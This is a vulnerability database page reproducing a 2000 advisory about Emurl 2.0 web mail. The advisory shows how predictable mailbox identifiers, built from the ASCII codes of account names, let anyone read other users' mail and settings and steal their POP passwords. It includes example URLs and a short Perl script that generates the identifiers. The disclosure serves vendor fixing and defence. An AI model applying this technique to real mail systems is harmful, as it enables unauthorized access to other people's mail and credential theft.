Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Emurl2.0.windows

🗓️ 17 May 2000 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Emurl 2.0 allows unauthorized mailbox access and POP password theft via predictable identifiers.

Code
`Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others)  
  
Product information: Emurl is web-based email host developped by SeattleLab.  
http://www1.seattlelab.com/emurl/  
  
Impact: Users can access the mailbox's content of anybody on the system.  
They can also steal their POP passwords since Emurl allows you to fetch your  
POP email from more than one source.  
  
Description:  
After logging into my new mail account powered by the Emurl software, this  
URL struck me:  
  
http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123  
  
I guess you all know where this is going. First, this identifier is based  
solely on your account name. Therefore, if you create an account with the  
same name on another site, you'll end up with the very same identifier.  
  
Furthermore, this identifier can easily be determined since it is "encoded"  
using the ascii value of each character of the account's name and  
incremented by its position.  
  
In this example, my user ID would be PBenoit and my resulting identifier  
would be 113100104114116111123.  
  
p = 112 + 1 = 113  
b = 98 + 2 = 100  
e = 101 + 3 = 104  
n = 110 + 4 = 114  
o = 111 + 5 = 116  
i = 105 + 6 = 111  
t = 116 + 7 = 123  
  
You could fetch the e-mails here  
  
http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>  
  
... and view/change the account's settings here  
  
http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier>  
  
I threw a few lines of perl together to generate this.  
  
print "Enter your ID: ";  
$_=lc(<STDIN>); chomp;  
print "Your identifier is: ";  
@letters=split(//, $_);  
for ($i = 0; $i < length($_); $i++) {  
$mychar = ord($letters[$i])+$i+1;  
if ($mychar < 100)  
{ $mychar = (0).$mychar;}  
print $mychar  
}  
  
  
Vendor status: SeattleLab is aware and the issue is addressed in their next  
version.  
  
______________________________________________  
FREE Personalized Email at Mail.com  
Sign up at http://www.mail.com/?sr=signup  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 May 2000 00:00Current
7.4High risk
Vulners AI Score7.4
emurl 2.0windows nt 4.0mailbox accesspop password theftidentifier vulnerabilityseattlelab.
25